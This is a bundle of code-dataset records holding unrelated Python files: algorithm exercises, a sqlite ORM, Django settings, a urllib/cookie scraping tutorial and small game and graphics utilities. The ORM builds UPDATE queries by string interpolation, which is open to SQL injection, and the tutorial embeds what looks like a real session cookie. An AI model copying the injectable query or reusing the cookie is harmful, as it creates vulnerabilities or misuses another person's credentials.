service_title})\n","sub_path":"apps/accounts/member_views.py","file_name":"member_views.py","file_ext":"py","file_size_in_byte":4717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"395056773","text":"n = int(input())\n\ndict = {}\n\nfor i in range(n):\n temp = input()\n length = len(temp)\n dict[temp] = length\n\nresult = []\n\nfor k,v in dict.items():\n result.append([k,v])\n\nresult.sort()\nresult.sort(key = lambda x : x[1])\n\nfor elem in result:\n print(elem[0])","sub_path":"sourcecode/1181_2.py","file_name":"1181_2.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"103514290","text":"\"\"\"\n# Definition for a Node.\nclass Node(object):\n def __init__(self, val, left, right):\n self.val = val\n self.left = left\n self.right = right\n\"\"\"\nclass Solution(object):\n def treeToDoublyList(self, root):\n \"\"\"\n :type root: Node\n :rtype: Node\n \"\"\"\n def helper(root):\n if not root.left and not root.right:\n return root, root\n if root.left:\n lh, lt = helper(root.left)\n lt.right = root\n root.left = lt\n else:\n lh = root\n if root.right:\n rh, rt = helper(root.right)\n rh.left = root\n root.right = rh\n else:\n rt = root\n return lh, rt\n if not root:\n return root\n h, t = helper(root)\n h.left, t.right = t, h\n return h\n","sub_path":"426_ConvertBinarySearchTreetoSortedDoublyLinkedList_M.py","file_name":"426_ConvertBinarySearchTreetoSortedDoublyLinkedList_M.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"319782021","text":"\"\"\"Реализация ORM, работающей с sqlite3\"\"\"\nimport sqlite3\nimport inspect\n\nSQLITE_TYPE_MAP = {\n int: \"INTEGER\",\n float: \"REAL\",\n str: \"TEXT\",\n bool: \"INTEGER\", # 0 or 1\n}\nCREATE_TABLE_SQL = \"CREATE TABLE {name} ({fields});\"\nINSERT_SQL = \"INSERT INTO {name} ({fields}) VALUES ({placeholders});\"\nSELECT_ALL_SQL = \"SELECT * FROM {name};\"\nSELECT_WHERE_SQL = \"SELECT * FROM {name} WHERE id=?;\"\nUPDATE_SQL = \"UPDATE {table_name} SET {query} WHERE id=?;\"\nDELETE_SQL = \"DELETE FROM {name} WHERE id=?\"\n\n\nclass Database:\n \"\"\"Класс, поддерживающий основные (CRUD) операции с БД\"\"\"\n def __init__(self, path):\n \"\"\"Инициализация соединения с БД\n\n Keyword arguments:\n path -- путь к БД\n \"\"\"\n self.conn = sqlite3.connect(path)\n\n def _execute(self, sql, params=None):\n \"\"\"Внутренний метод исполнения sql запроса\n\n Keyword arguments:\n sql -- SQL запрос (возможно, в нём будут '?')\n params -- параметры, замещающие '?' в sql\n \"\"\"\n if params:\n self.conn.execute(sql, params)\n else:\n self.conn.execute(sql)\n\n def create(self, table):\n \"\"\"Метод создания таблицы\n\n Keyword arguments:\n table -- класс-таблица\n \"\"\"\n self._execute(table.get_create_sql())\n\n def add(self, instance):\n \"\"\"Метод вставки объекта-строки таблицы в БД\n\n Keyword arguments:\n instance -- объект-строка таблицы instance.__class__\n\n Exceptions:\n ValueError - если объект уже занесён в БД\n \"\"\"\n if instance.record_id is not None:\n raise ValueError(\"Этот объект уже занесён в БД\")\n sql, values = instance.get_insert_sql()\n self._execute(sql, values)\n instance.__class__.size_inc()\n instance.record_id = instance.__class__.size()\n self.conn.commit()\n\n def all(self, table):\n \"\"\"Запрос на вывод содержимого таблицы\n\n Keyword arguments:\n table -- класс-таблица\n\n Returns:\n содержимое таблицы в виде списка кортежей\n \"\"\"\n result = []\n sql = table.get_select_all_sql()\n for row in self.conn.execute(sql):\n result.append(row)\n return result\n\n def get(self, table, record_id):\n \"\"\"Запрос на вывод содержимого таблицы по id\n\n Keyword arguments:\n table -- класс-таблица\n record_id -- id записи в таблице table\n\n Returns:\n содержимое таблицы по id=record_id\n \"\"\"\n result = []\n sql = table.get_select_where_sql()\n params = (str(record_id),)\n for row in self.conn.execute(sql, params):\n result.append(row)\n return result\n\n def update(self, instance):\n \"\"\"Запрос на обновление строки таблицы, соответствующей instance\n\n Keyword arguments:\n instance -- объект-строка таблицы instance.__class__\n \"\"\"\n sql = instance.get_update_sql()\n self._execute(sql, (str(instance.record_id),))\n self.conn.commit()\n\n def delete(self, instance):\n \"\"\"Запрос на удаление строки таблицы, соответствующей instance\n\n Keyword arguments:\n instance -- объект-строка таблицы instance.__class__\n \"\"\"\n sql = instance.get_delete_sql()\n self._execute(sql, (str(instance.record_id),))\n instance.record_id = None\n self.conn.commit()\n\n def __del__(self):\n \"\"\"Закрытие соединения с БД\"\"\"\n self.conn.close()\n\n\nclass Table:\n \"\"\"Класс для работы с конкретной таблицей БД\"\"\"\n _size = 0\n\n def __init__(self, **kwargs):\n \"\"\"Инициализация объекта-строки\n\n Keyword arguments:\n kwargs -- значения в колонке таблицы\n\n Exceptions:\n ValueError - в таблице нет одной из указанных колонок\n \"\"\"\n self.record_id = None\n for name, value in kwargs.items():\n if name in self.__class__.__dict__:\n self.__dict__[name] = value\n else:\n raise ValueError(\"В таблице нет такой колонки\")\n\n @property\n def record_id(self):\n \"\"\"Getter record_id\"\"\"\n return self._id\n\n @record_id.setter\n def record_id(self, new_id):\n \"\"\"Setter record_id\"\"\"\n self._id = new_id\n\n @classmethod\n def size(cls):\n \"\"\"\n Returns:\n Текущий размер таблицы (номер последнего id в ней)\n \"\"\"\n return cls._size\n\n @classmethod\n def size_inc(cls):\n \"\"\"Инкрементирует хранимый размер таблицы\"\"\"\n cls._size += 1\n\n @classmethod\n def set_size(cls, new_size):\n \"\"\"Задание текущего размера таблицы\n (нужно для операций с заранее заданной таблицей)\n\n Keyword arguments:\n new_size -- новый размер таблицы\n \"\"\"\n cls._size = new_size\n\n @classmethod\n def size_zeroing(cls):\n \"\"\"Обнуляет число элементов таблицы (нужно при тестировании)\"\"\"\n cls._size = 0\n\n @classmethod\n def get_name(cls):\n \"\"\"\n Returns:\n название таблицы в БД\n \"\"\"\n return cls.__name__.lower()\n\n @classmethod\n def get_create_sql(cls):\n \"\"\"Создание запроса на создание таблицы БД\n\n Returns:\n Сгенерированный запрос\n \"\"\"\n fields = [\n (\"id\", \"INTEGER PRIMARY KEY AUTOINCREMENT\")\n ]\n for name, field in inspect.getmembers(cls):\n if isinstance(field, Column):\n fields.append((name, field.sql_type))\n fields = [\" \".join(x) for x in fields]\n return CREATE_TABLE_SQL.format(name=cls.get_name(),\n fields=\", \".join(fields))\n\n def get_insert_sql(self):\n \"\"\"Создание запроса на вставку строки в таблицу\n\n Returns:\n Кортеж из запроса с '?' на месте значений и самих значений\n \"\"\"\n cls = self.__class__\n fields = []\n placeholders = []\n values = []\n for name, field in inspect.getmembers(cls):\n if isinstance(field, Column):\n if isinstance(getattr(self, name), Column):\n raise ValueError(\"Не задано значение колонки\")\n fields.append(name)\n values.append(getattr(self, name))\n placeholders.append('?')\n sql = INSERT_SQL.format(name=cls.get_name(),\n fields=\", \".join(fields),\n placeholders=\", \".join(placeholders))\n return sql, values\n\n @classmethod\n def get_select_all_sql(cls):\n \"\"\"\n Returns:\n Запрос на вывод всего содержимого таблицы\n \"\"\"\n sql = SELECT_ALL_SQL.format(name=cls.get_name())\n return sql\n\n @classmethod\n def get_select_where_sql(cls):\n \"\"\"\n Returns:\n Запрос на вывод строки таблицы по id с '?' вместо id\n \"\"\"\n sql = SELECT_WHERE_SQL.format(name=cls.get_name())\n return sql\n\n def get_update_sql(self):\n \"\"\"Создание запроса на изменение строки в таблице\n\n Returns:\n Запрос-UPDATE с '?' вместо id\n \"\"\"\n cls = self.__class__\n query = []\n for name, field in inspect.getmembers(cls):\n if isinstance(field, Column):\n if isinstance(getattr(self, name), Column):\n raise ValueError(\"Не задано значение колонки\")\n val = getattr(self, name)\n if isinstance(getattr(self, name), str):\n query.append(\"{name}='{val}'\".format(name=name, val=val))\n else:\n query.append(\"{name}={val}\".format(name=name, val=val))\n sql = UPDATE_SQL.format(table_name=self.get_name(),\n query=\", \".join(query))\n return sql\n\n def get_delete_sql(self):\n \"\"\"\n Returns:\n Запрос на удаление строки таблицы по id с '?' вместо id\n \"\"\"\n return DELETE_SQL.format(name=self.get_name())\n\n\nclass Column:\n \"\"\"Класс для отображения типов python в SQL типы\"\"\"\n def __init__(self, column_type):\n \"\"\"Инициализация объекта-типа столбца таблицы\n\n Keyword arguments:\n column_type -- один из классов int, float, str, bool\n\n Returns:\n Запрос-UPDATE с '?' вместо id\n \"\"\"\n self._type = column_type\n\n @property\n def sql_type(self):\n \"\"\"Getter для SQL типа, заданного объектом этого класса\"\"\"\n return SQLITE_TYPE_MAP[self._type]\n\n\nif __name__ == '__main__':\n pass\n","sub_path":"HW_3/orm.py","file_name":"orm.py","file_ext":"py","file_size_in_byte":10054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"267330849","text":"from settings import *\nimport os\n\nEMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'\nMIDDLEWARE.append('middleware.dev_cors_middleware')\n\nif os.environ.get('POSTGRES', False):\n DATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql',\n 'NAME': 'bias',\n 'USER': 'postgres',\n 'PASSWORD': 'mysecretpassword',\n 'HOST': '127.0.0.1',\n 'PORT': '5432',\n }\n }\n\n\nCACHES = {\n 'default': {\n 'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',\n }\n}\n","sub_path":"server/settings_dev.py","file_name":"settings_dev.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"625254847","text":"# -*- coding:utf-8 -*-\n# @Desc : \n# @Author : Administrator\n# @Date : 2019-07-17 14:24\n\n# Python2:urllib2、urllib\n# Python3:把urllib2和urllib合并,urllib.request\n\n# encode() : 字符串 --> bytes\n# decode() : bytes --> 字符串\n\nimport urllib\n\n### urllib.request模块的常用方法:\n## response = urllib.request.urlopen(url) # get请求,查询参数在URL地址中显示\n# 参数说明: url表示请求的地址\n# 作用: 向网站发起一个请求并获取响应\n# 返回值: 是一个http.client.HTTPResponse对象,这个对象是一个类文件句柄对象\n## urllib.request.Request(url,data=data,headers=headers) # 构建post请求对象req,\n# 注: data表单数据以bytes类型提交,不能是str\n# 处理form表单数据为bytes类型:\n# 1.把提交的form表单数据定义为字典类型: data = {key:value}\n# 2.把定义为字典类型的form表单数据进行编码: data = urllib.parse.urlencode(data)\n# 3.把编码后的form表单数据转为bytes数据类型: data = bytes(data)\n\n\n## urllib.request.Request(url,data=data,headers=headers) # 添加请求头信息User-Agent,字典形式存在headers中\n# 示例:\n# url = \"http://www.baidu.com/\"\n# headers = {\n# \"User-Agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36\"\n# }\n# 1.创建请求对象(包含User-Agent)\n# req = urllib.request.Request(url,headers=headers)\n# 2.获取响应对象\n# response = urllib.request.urlopen(req)\n# 3.获取响应数据\n# data_str = res.read().decode(\"utf-8\")\n\n\n## urllib.request.ProxyHandler() # 设置IP代理\n# 1.使用ProxyHandler,传入IP代理构建一个handler\nhandler = urllib.request.ProxyHandler({\"https\":\"112.87.71.209:9999\"})\n# 2.使用已创建的handler构建以个opener\nopener = urllib.request.build_opener(handler)\n# 如果需要添加请求头(User-Agent)信息需要使用Request类\n# req = request.Request(url,headers)\n# response = opener.open(req)\n# 3.使用opener去发送一个请求open()\nresponse = opener.open(\"http://www.baidu.com\")\n\n# Handler处理器分类:\n# HTTPHandler() # 没有任何特殊功能\n# ProxyHandler({\"协议\":\"IP地址:端口号\"}) # 普通代理\n# ProxyBasicAuthHandler(密码管理器对象) # 私密代理\n# HTTPBasicAuthHandler(密码管理器对象) # web客户端认证\n\n\n## urllib.request.Request(url,data=data,headers=headers) # 添加cookie信息模拟登陆,字典形式存在headers中\nlogin_before = \"http://www.renren.com/SysHome.do\" # 人人网登陆页面\nlogin_after = \"http://www.renren.com/893394172/profile\" # 人人网登陆后个人主页\nheaders = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36\",\n \"Cookie\":\"anonymid=jtpd8l73-kbnu9w; depovince=GW; _r01_=1; JSESSIONID=abcKxe6-uz3U-fd0nK4Mw; ick_login=17af5e13-8091-4915-b704-ba0dd553a56c; ick=2cebb1a8-320f-409f-b97c-d7689da8ea12; first_login_flag=1; ln_uact=18103763930; ln_hurl=http://head.xiaonei.com/photos/0/0/men_main.gif; jebe_key=09416abf-1d11-4c6c-8467-da91b972e2bc%7C5b34e73601acb25887c4068b9cf69955%7C1553579872178%7C1%7C1553579871820; jebecookies=b17c717a-60d0-41e2-b6e1-8d14325adb62|||||; _de=3F1C6150E59B993580B4C5FE015D8D28; p=a31aab50cb8d58a4f779dfd1cf9c348c2; t=1da5424772e1107fe8c4e9fc60151a562; societyguester=1da5424772e1107fe8c4e9fc60151a562; id=893394172; xnsid=475dd7b9; loginfrom=syshome; wp_fold=0\"\n}\nreq = urllib.request.Request(url=login_after, headers=headers)\nresponse = urllib.request.urlopen(req)\n\n\n## urlretrieve() # 把请求响应的数据保存到本地文件中\n# 函数原型: def urlretrieve(url, filename=None, reporthook=None, data=None)\nresult = urllib.request.urlretrieve(\"http://www.baidu.com\",'baidu.txt')\n\n\n### http.client.HTTPResponse(即请求响应对象)方法:\n# read() # 读取响应的所有字节数据,bytes\n# read().decode('utf-8')) # 读取响应的所有字符串数据,string\n# readline() # 读取响应的一行数据,字节bytes数据\n# readlines() # 读取响应的多行数据,字节bytes列表\n# getcode() # 获取请求后的响应状态码\n# geturl() # 返回实际的URL地址,常常重定向之后使用\n\n\n\n\n\n\n\n### http.cookiejar模块管理cookie模拟登陆\n# http.cookiejar模块主要的类有: CookieJar, FileCookieJar, MozillaCoookieJar, LWPCookieJar\nfrom http.cookiejar import CookieJar\n# 1.创建CookieJar对象\ncookiejar = CookieJar()\n# 2.使用CookieJar对象创建一个HTTPCookieProcess对象\nhandler = urllib.request.HTTPCookieProcessor(cookiejar)\n# 3.使用上一步的handler创建一个opener\nopener = urllib.request.build_opener(handler)\n# 4.使用opener发送登陆请求(人人网的账号和密码)\nheaders = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36\"\n}\ndata = {\n \"email\": \"1810376****\",\n \"password\": \"****123456\"\n}\nlogin_before = \"http://www.renren.com/PLogin.do\" # 人人网登陆页面\nreq = urllib.request.Request(url=login_before, data=urllib.parse.urlencode(data).encode(\"utf-8\"), headers=headers)\nresponse = opener.open(req)\n# 登陆成功后,访问个人主页\n# 获取个人主页页面的时候,不需要新建opener,而是使用之前创建的opener,之前的opener包含了登陆所需要的cookie信息\nlogin_after = \"http://www.renren.com/893394172/profile\" # 人人网登陆后个人主页\nreq2 = urllib.request.Request(url=login_after, headers=headers)\nresponse = opener.open(req2)\n\n\n\n### cookie信息的加载与保存\nfrom http.cookiejar import MozillaCookieJar\nmozillacookiejar = MozillaCookieJar(\"cookie.txt\")\nhandler = urllib.request.HTTPCookieProcessor(mozillacookiejar)\nopener = urllib.request.build_opener(handler)\n## 保存\nopener.open(\"http://httpbin.org/cookies/set?user=zhangsan\")\nmozillacookiejar.save(ignore_discard=True)\n## 加载\nmozillacookiejar.load(ignore_discard=True)\nopener.open(\"http://httpbin.org/cookies\")\nfor cookie in mozillacookiejar:\n print(cookie)","sub_path":"[14]Python-网络爬虫部分/02urllib库-request模块.py","file_name":"02urllib库-request模块.py","file_ext":"py","file_size_in_byte":6114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"442678134","text":"\n\nfrom xai.brain.wordbase.verbs._infringe import _INFRINGE\n\n#calss header\nclass _INFRINGED(_INFRINGE, ):\n\tdef __init__(self,): \n\t\t_INFRINGE.__init__(self)\n\t\tself.name = \"INFRINGED\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"infringe\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_infringed.py","file_name":"_infringed.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"124691027","text":"\n\nfrom xai.brain.wordbase.verbs._proselyte import _PROSELYTE\n\n#calss header\nclass _PROSELYTES(_PROSELYTE, ):\n\tdef __init__(self,): \n\t\t_PROSELYTE.__init__(self)\n\t\tself.name = \"PROSELYTES\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"proselyte\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_proselytes.py","file_name":"_proselytes.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"19086203","text":"# WallBuilder.py\n# Handles the building of Wall objects passed from LevelBuilder\n\n# Imports\nfrom Wall import *\n\nclass WallBuilder(object):\n 'Handles the building of Wall objects passed from LevelBuilder'\n\n # WallBuilder(self, row, col)\n # Starts a wall with the leftmost position at (row, col)\n def __init__(self, row, col, ppm):\n print(\"WallBuilder created.\")\n \n # Debug info\n self.DEBUG=0\n self.DEBUG_TAG=\"[WallBuilder]\"\n\n # PPM\n self.ppm=ppm\n\n # Variables\n self.x_start=row\n self.y_start=col\n self.active_check=0\n self.x_span=0\n self.y_span=0\n self.line_type=\"\"\n \n # Storage\n self.wall_storage=[]\n\n # Functions\n # active(self)\n # Checks to see if the WallBuilder has been initialized\n def activeBuild(self):\n if (self.active_check == 1):\n return 1\n else:\n return 0\n\n # activateBuilder(self)\n # Activates the WallBuilder; informs us that a Wall has begun construction\n def activateBuilder(self):\n \n if (self.DEBUG == 1):\n print(self.DEBUG_TAG + \":activateBuilder\")\n \n # WB now active\n self.active_check=1\n self.x_span=1\n self.y_span=1\n\n # resetBuilder(self)\n # Returns the WallBuilder to default setup for next Wall\n def resetBuilder(self):\n if (self.DEBUG == 1):\n print(self.DEBUG_TAG + \":resetBuilder\")\n self.active_check=0\n self.x_span=0\n self.y_span=0 \n self.x_start=0\n self.y_start=0\n\n # extendWall(self)\n # Extends walls one block to the right\n def extendWall(self):\n if (self.DEBUG == 1):\n print(self.DEBUG_TAG + \":extendWall\")\n self.x_span+=1\n\n # updateStartPosition(self, x, y)\n # Updates the position where WallBuilder creates a new wall\n def updateStartPosition(self, x, y):\n if (self.DEBUG == 1): \n print(self.DEBUG_TAG + \":updateStartPosition:\" + str(x) + \":\" + str(y))\n self.x_start=x\n self.y_start=y\n\n # closeWall(self)\n # Closes the Wall and creates a Wall object\n def closeWall(self):\n if (self.DEBUG == 1):\n print(self.DEBUG_TAG + \":closeWall\")\n \n self.x_span+=1\n\n if (self.DEBUG == 1):\n print(self.DEBUG_TAG + \":closeWall:span:\" + str(self.x_span) + \":\" + str(self.y_span))\n print(self.DEBUG_TAG + \":closeWall:pos:\" + str(self.x_start) + \":\" + str(self.y_start))\n\n # Build Wall; value of y_span still needs to be used for vertical walls later\n new_wall=Wall(self.x_start*self.ppm.getX(), self.y_start*self.ppm.getY(), self.x_span*self.ppm.getX(), self.y_span*self.ppm.getY())\n self.wall_storage.append(new_wall)\n\n # Resets the WallBuilder\n self.resetBuilder()\n\n # wallCollection(self)\n # Returns all Wall objects\n def wallCollection(self):\n if (self.DEBUG == 1):\n print(self.DEBUG_TAG + \":wallCollection\")\n return self.wall_storage\n","sub_path":"Invaders/Code/WallBuilder.py","file_name":"WallBuilder.py","file_ext":"py","file_size_in_byte":2781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"187814196","text":"#!/usr/bin/env python\nimport svgwrite\nimport random\nimport math\n\n\n# dummy vars for use in test\n\n# from user\nprimary = [0, 110, 170]\naccent1 = [255, 50, 0]\naccent2 = [255, 180, 0]\nbackground = [0, 160, 255]\n# from system\nwidth = 800\nheight = 600\nlocation = r'C:\\Users\\Lauren\\Desktop\\test.svg'\n\n\n\nclass element:\n\n\tdef __init__ ( self ):\n\t\tpass\n\n\tdef selectColour(p, a1, a2):\n\t\t# Allows each element to be randomly assigned a colour, biased toward the primary colour\n\t\trand = random.random() # randomise colour\n\t\tif rand <= 0.5: # 50% primary colour\n\t\t\treturn p\n\t\telif rand <= 0.75: # 25% accent 1\n\t\t\treturn a1\n\t\telif rand <= 1: # 25% accent 2\n\t\t\treturn a2\n\n\n\nclass image:\n\n\tdef __init__ ( self, loc, h, w, p, a1, a2, b):\n\t\tself.dwg = svgwrite.Drawing( loc, size=( w, h ) )\n\t\tself.height = h\n\t\tself.width = w\n\t\tself.primary = p\n\t\tself.accent1 = a1\n\t\tself.accent2 = a2\n\t\tself.background = b\n\n\tdef createBackground ( self ):\n\t\t# create solid colour background\n\t\tbackground = self.dwg.add( self.dwg.rect( insert=( 0, 0 ), size=( self.width, self.height ) ) )\n\t\tbackground.fill( svgwrite.rgb( self.background[0],self.background[1],self.background[2] ), opacity=1 )\n\n\n\n\nimg = image( location, height, width, primary, accent1, accent2, background )\n\nimg.createBackground()\nimg.dwg.save()\n\n\n\n\n\n\n\n\n\n\n\ndef circles( self, dwg ):\n\n\t# define orbital spacing\n\torbits = 80 # number of oribits\n\tobitDistance = 40 # distance between each orbit\n\n\t# define angular spacing\n\tangleScaler = 2\n\n\t# define seed location\n\tseedWidth = width * 0.75 # can only appear inside centre 3/4\n\tseedHeight = height * 0.75\n\tminWidth = width * 0.125\n\tminHeight = height * 0.125\n\tseedX = minWidth + ( seedWidth * random.random() )\n\tseedY = minHeight + ( seedHeight * random.random() )\n\n\t# select imploding or exploding\n\tdirection = random.random()\n\n\tif direction >= 0.5:\n\t\t# exploding starts with large seed radius\n\t\tseedRadius = random.uniform( 50, 55 )\n\telse:\n\t\t# imploding starts with small seed radius\n\t\tseedRadius = random.uniform( 5, 10 )\n\n\n\t# loop through orbital rings\n\tfor orbit in range ( 1, orbits ):\n\n\t\tfor dot in range( 0, orbit * angleScaler ):\n\n\t\t\tif direction >= 0.5:\n\t\t\t\tseedRadius = seedRadius * random.uniform( 0.998, 0.999 ) # exploding gets smaller outwards\n\t\t\t\torbitRadius = obitDistance * orbit * random.uniform( 0.50, 0.80 ) # exploding has larger spacing between orbits\n\t\t\telse:\n\t\t\t\tseedRadius = seedRadius * random.uniform( 1.0, 1.0005 ) # imploding gets larger outwards\n\t\t\t\torbitRadius = obitDistance * orbit * random.uniform( 0.20, 0.50 )\t# imploding has smaller spacing between orbits\n\n\t\t\t# get random angle and x, y from seed location\n\t\t\tangle = random.uniform( 0, 360 )\n\t\t\tdotX = orbitRadius * math.cos( angle )\n\t\t\tdotY = orbitRadius * math.sin( angle )\n\t\t\t# add to seed loaction\n\t\t\tdotX = seedX + dotX\n\t\t\tdotY = seedY + dotY\n\n\t\t\t# create element\n\t\t\telement = dwg.add( dwg.circle( center = ( dotX, dotY ), \n\t\t\t\t\t\t\t\t\t\t r = seedRadius * random.uniform( 0.8, 1 )))\n\t\t\t\n\t\t\telement.fill( svgwrite.rgb( selectColour(primary, accent1, accent2) ), opacity=0.75 )\n\n\treturn dwg\n\n\n# horizontal / vertical stripes\ndef stripes(width, height, dwg):\n\n\t# define seed location\n\tleft = 0\n\tright = width\n\ttop = height\n\tbottom = 0\n\n\t# define stripe parameters\n\tthickness = random.uniform( 350, 450 )\n\tminThickness = 20\n\tminAngle = -15\n\tmaxAngle = 15\n\tspread = 300\n\tnumberStripes = 20\n\n\t# select horizontal or vertical\n\tdirection = random.random()\n\n\tfor stripe in range ( 1, numberStripes ):\n\n\t\t# set thickness of line\n\t\tthickness = thickness * random.uniform( 0.5, 0.999 )\n\n\t\t# restrict minimum thickness\n\t\tif thickness <= minThickness:\n\t\t\tthickness = minThickness*( 1 + random.random() )\n\n\t\t# set angle to skew line to\n\t\tangle = random.uniform( minAngle, maxAngle )\n\n\t\t# create either horizontal or vertical lines\n\t\tif direction >= 0.5:\n\t\t\t# vertical position of horizontal stripe stays within spread area\n\t\t\tvertPos = ( top / 2 ) - thickness + random.uniform( -spread, spread )\n\t\t\telement = dwg.add( dwg.rect( insert=( left, vertPos ), \n\t\t\t\t\t\t\t\t\t\t size=( right, thickness ) ) )\n\t\t\t# skew to predefined angle\n\t\t\telement.skewY( angle )\n\t\telse:\n\t\t\t# horizontal position of vertical stripe stays within spread area\n\t\t\thoriPos = ( right / 2 ) - thickness + random.uniform( -spread, spread )\n\t\t\telement = dwg.add(dwg.rect( insert=( horiPos, bottom ), \n\t\t\t\t\t\t\t\t\t\tsize=( thickness, top ) ) )\n\t\t\t# skew to predefined angle\n\t\t\telement.skewX( angle )\n\n\t\telement.fill( svgwrite.rgb( selectColour(primary, accent1, accent2) ), opacity=0.75 )\n\n\treturn dwg\n\n\ndef selectColour(p, a1, a2):\n\t# Allows each element to be randomly assigned a colour, biased toward the primary colour\n\trand = random.random()\t\t# randomise colour\n\tif rand <= 0.5:\t\t\t\t# 50% primary colour\n\t\treturn p\n\telif rand <= 0.75:\t\t\t# 25% accent 1\n\t\treturn a1\n\telif rand <= 1:\t\t\t\t# 25% accent 2\n\t\treturn a2\n\n","sub_path":"wallpaperGenerator/style.py","file_name":"style.py","file_ext":"py","file_size_in_byte":4830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"82846518","text":"class Misc:\n\n BLANK = \"\"\n\n def __init__(self):\n pass\n\n\n @staticmethod\n def apply_if_not_present( df, cls, to_delete ):\n try:\n idx = df.columns.get_loc( cls.describe() )\n except:\n print( \"Could not find \" + str( cls.describe() ))\n df = cls.apply(df)\n to_delete.append( cls.describe() )\n return [ df, to_delete ]\n\n @staticmethod\n def roc_pct(row, horizon, feature ):\n change = row[ feature ] - row[ feature + \"_T-\" + str( horizon ) ]\n change_pct = change/row[feature + \"_T-\" + str( horizon )]\n return change_pct\n\n @staticmethod\n def change(row, horizon, feature):\n chg = row[feature] - row[feature + \"_T-\" + str(horizon)]\n return chg\n\n @staticmethod\n def rsi( row, rma_adv, rma_dec, sum_n_adv, sum_n_dec ):\n sum_n_adv_v = abs(row[sum_n_adv ])\n sum_n_dec_v = abs(row[sum_n_dec])\n\n rma_adv_v = abs( row[rma_adv])\n rma_dec_v = abs( row[rma_dec])\n\n mean_adv_v = rma_adv_v\n mean_dec_v = rma_dec_v\n\n if mean_dec_v == 0:\n ratio = 0\n else:\n ratio = 100/(1+(mean_adv_v/mean_dec_v))\n\n r = 100 - ratio\n\n return r","sub_path":"MCMC/Misc.py","file_name":"Misc.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"585748014","text":"#!/usr/bin/env python3\n# Author: Tyson Andre\nimport re\nimport sys\n\n# assumes file names don't have spaces.\n# Could rewrite all of this to use JSON.\nREDEFINE_REGEX=re.compile(r'^\\S+:\\d+ PhanRedefine\\w+ .*defined at (\\S*):\\d+.*at (\\S+):\\d+$')\nassert(REDEFINE_REGEX.match(r'aaXX/fy.php:571 PhanRedefineFunction Function error defined at aaXX/fy.php:571 was previously defined at blah/law.inc:193'))\n\ndef compare_files(a, b):\n '''Can be customized. If this returns true, a is preferred to be kept over b'''\n return a < b\n\ndef get_redefine_pairs(filename):\n fin = open(filename, 'r')\n for line in fin:\n if ' PhanRedefine' in line:\n match = REDEFINE_REGEX.match(line)\n if match is not None:\n original = match.group(1)\n other = match.group(2)\n yield original, other, line\n\n\ndef main():\n if len(sys.argv) != 2:\n print(\"Usage: {} pylint_results.txt\".format(sys.argv[1]))\n print(\" This script parses pylint analysis results and spits out a list of exclusions for duplicate class/function entries\")\n sys.exit(1)\n filename = sys.argv[1]\n sys.stderr.write(\"Choosing files to exclude in '{}'\\n\".format(filename))\n excluded_files = set()\n for original, other, line in get_redefine_pairs(filename):\n if original in excluded_files:\n continue\n if other in excluded_files:\n continue\n excluded_files.add(other if compare_files(original, other) else original)\n\n print(\" 'exclude_file_list' => [\")\n if len(excluded_files) > 0:\n print(' // These files were excluded because they duplicated class or method definitions')\n for excluded_filename in sorted(excluded_files):\n print(' ' + repr(excluded_filename) + ',')\n print(\" ],\")\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"contrib/redefines.py","file_name":"redefines.py","file_ext":"py","file_size_in_byte":1857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"308331371","text":"from django.views import generic as generic_views\nfrom django.shortcuts import render_to_response\nfrom django.template import RequestContext\nfrom django.views.decorators.cache import never_cache\nfrom PIL import Image\nfrom django.conf import settings\nimport shutil\n\nfrom Muhovic.frontend.models import Type, Artwork\n\n\nclass ManagerView(generic_views.TemplateView):\n template_name = 'manager/manage.html'\n\n @never_cache\n def get(self, request, *args, **kwargs):\n return super(ManagerView, self).get(request, *args, **kwargs)\n\n def post(self, request, *args, **kwargs):\n if request.POST.get('action') == 'delete':\n for id in request.POST.getlist('img_id'):\n Artwork.objects.get(id=id).delete()\n elif request.POST.get('action') == 'add':\n image_upload(request)\n return super(ManagerView, self).get(request, *args, **kwargs)\n\n def get_context_data(self, **kwargs):\n context = dict()\n c = Type.objects.all()\n categories = []\n for cat in c:\n images = Artwork.objects.filter(category=cat)\n ls = []\n for img in images:\n ls.append([img.thumb(), img.id])\n categories.append([[cat, cat.id], ls])\n context['categories'] = categories\n return context\n\n\ndef 